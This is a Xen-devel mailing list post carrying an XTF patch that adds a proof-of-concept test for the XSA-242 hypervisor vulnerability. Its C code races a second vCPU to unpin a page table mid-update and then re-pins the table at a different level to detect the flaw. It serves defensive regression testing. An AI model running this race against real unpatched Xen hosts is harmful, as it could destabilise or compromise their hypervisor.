[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Xen-devel] [PATCH XTF] XSA-242 PoC



Signed-off-by: Jan Beulich <jbeulich@xxxxxxxx>

--- /dev/null
+++ b/tests/xsa-242/Makefile
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-242
+CATEGORY  := xsa
+TEST-ENVS := pv64
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
--- /dev/null
+++ b/tests/xsa-242/extra.cfg.in
@@ -0,0 +1 @@
+vcpus=2
--- /dev/null
+++ b/tests/xsa-242/main.c
@@ -0,0 +1,162 @@
+/**
+ * @file tests/xsa-242/main.c
+ * @ref test-xsa-242
+ *
+ * @page test-xsa-242 XSA-242
+ *
+ * Advisory: [XSA-242](http://xenbits.xen.org/xsa/advisory-242.html)
+ *
+ * @todo Docs for test-xsa-242
+ *
+ * @see tests/xsa-242/main.c
+ */
+#include <xtf.h>
+
+#include <xen/vcpu.h>
+
+#include <arch/pagetable.h>
+#include <arch/symbolic-const.h>
+
+const char test_title[] = "XSA-242 PoC";
+
+int hypercall_pin_table(unsigned int level, void *va)
+{
+    mmuext_op_t op = {
+        .cmd = MMUEXT_PIN_L1_TABLE + level - 1,
+        .arg1.mfn = virt_to_mfn(va),
+    };
+
+    return hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+}
+
+int hypercall_unpin_table(void *va)
+{
+    mmuext_op_t op = {
+        .cmd = MMUEXT_UNPIN_TABLE,
+        .arg1.mfn = virt_to_mfn(va),
+    };
+
+    return hypercall_mmuext_op(&op, 1, NULL, DOMID_SELF);
+}
+
+static void *volatile table;
+
+unsigned long vcpu1_stack[1024];
+
+void vcpu1_main(void)
+{
+    for ( ; ; )
+    {
+        if ( table )
+        {
+            hypercall_unpin_table(table);
+            table = NULL;
+        }
+    }
+}
+
+void test_main(void)
+{
+    static intpte_t l2t[L2_PT_ENTRIES] __page_aligned_bss;
+    static intpte_t l1t[L1_PT_ENTRIES] __page_aligned_bss;
+    static char data[PAGE_SIZE] __page_aligned_bss;
+    struct xen_vcpu_guest_context gc = {
+        .user_regs.cs = __KERN_CS,
+        .user_regs.eip = (long)vcpu1_main,
+        .user_regs.ss = __KERN_DS,
+        .user_regs.esp = (long)(vcpu1_stack + ARRAY_SIZE(vcpu1_stack)),
+        .user_regs.flags = X86_EFLAGS_IF | 0x1000,
+        .user_regs.ds = __KERN_DS,
+        .user_regs.es = __KERN_DS,
+        .flags = VGCF_in_kernel,
+        .kernel_ss = __KERN_DS,
+        .kernel_sp = (long)(vcpu1_stack + ARRAY_SIZE(vcpu1_stack)),
+        .ctrlreg[3] = read_cr3(),
+    };
+    unsigned int i;
+    int rc;
+
+    for ( i = 0; i < L1_PT_ENTRIES; ++i )
+        l1t[i] = pte_from_virt(data, PF_SYM(AD, P));
+
+    rc = hypercall_update_va_mapping(_u(l2t),
+                                     pte_from_virt(l2t, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap L2 pt as read-only: %d\n", rc);
+
+    rc = hypercall_update_va_mapping(_u(l1t),
+                                     pte_from_virt(l1t, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap L1 pt as read-only: %d\n", rc);
+
+    rc = hypercall_update_va_mapping(_u(data),
+                                     pte_from_virt(data, PF_SYM(AD, P)),
+                                     UVMF_INVLPG);
+    if ( rc )
+        return xtf_error("Failed to remap data as read-only: %d\n", rc);
+
+    /* Bring up the other vcpu. */
+    rc = hypercall_vcpu_op(VCPUOP_initialise, 1, &gc);
+    if ( rc )
+        return xtf_error("Could not init vCPU #1 (%d)\n", rc);
+
+    rc = hypercall_vcpu_op(VCPUOP_up, 1, NULL);
+    if ( rc )
+        return xtf_error("Could not start vCPU #1 (%d)\n", rc);
+
+    while ( (rc = hypercall_vcpu_op(VCPUOP_is_up, 1, NULL)) == 0 )
+        hypercall_yield();
+
+    if ( rc < 0 )
+        return xtf_error("Could not check vCPU #1 state (%d)\n", rc);
+
+    /* We're trying to lose a race, so try a number of times. */
+    for ( i = 0; i < 1000; ++i )
+    {
+        mmu_update_t mu;
+
+        rc = hypercall_pin_table(2, l2t);
+        if ( rc )
+            return xtf_error("Failed to pin L2 pt: %d\n", rc);
+
+        /* Kick off the other vCPU and link L1 into L2. */
+        mu.ptr = virt_to_maddr(l2t) | MMU_NORMAL_PT_UPDATE;
+        mu.val = virt_to_maddr(l1t) | PF_SYM(AD, RW, P);
+        table = l2t;
+        rc = hypercall_mmu_update(&mu, 1, NULL, DOMID_SELF);
+        if ( rc )
+            return xtf_error("Failed to link L1 into L2: %d\n", rc);
+
+        do {
+            asm volatile ( "pause" ::: "memory" );
+        } while ( table );
+
+        rc = hypercall_unpin_table(l2t);
+        /* Did the other vCPU lose the race? */
+        if ( !rc )
+            continue;
+
+        /* Now try to pin the same table as an L3 one. */
+        rc = hypercall_pin_table(3, l2t);
+        if ( rc )
+            return xtf_failure("Fail: Vulnerable to XSA-242 (%u)\n", i);
+
+        rc = hypercall_unpin_table(l2t);
+        if ( rc )
+            return xtf_error("Failed to unpin L3: %d\n", rc);
+    }
+
+    xtf_success("Success: Apparently not vulnerable to XSA-242\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */




_______________________________________________
Xen-devel mailing list
Xen-devel@xxxxxxxxxxxxxxxxxxxx
https://lists.xenproject.org/mailman/listinfo/xen-devel

 


Rackspace

Lists.xenproject.org is hosted with RackSpace, monitoring our
servers 24x7x365 and backed by RackSpace's Fanatical Support®.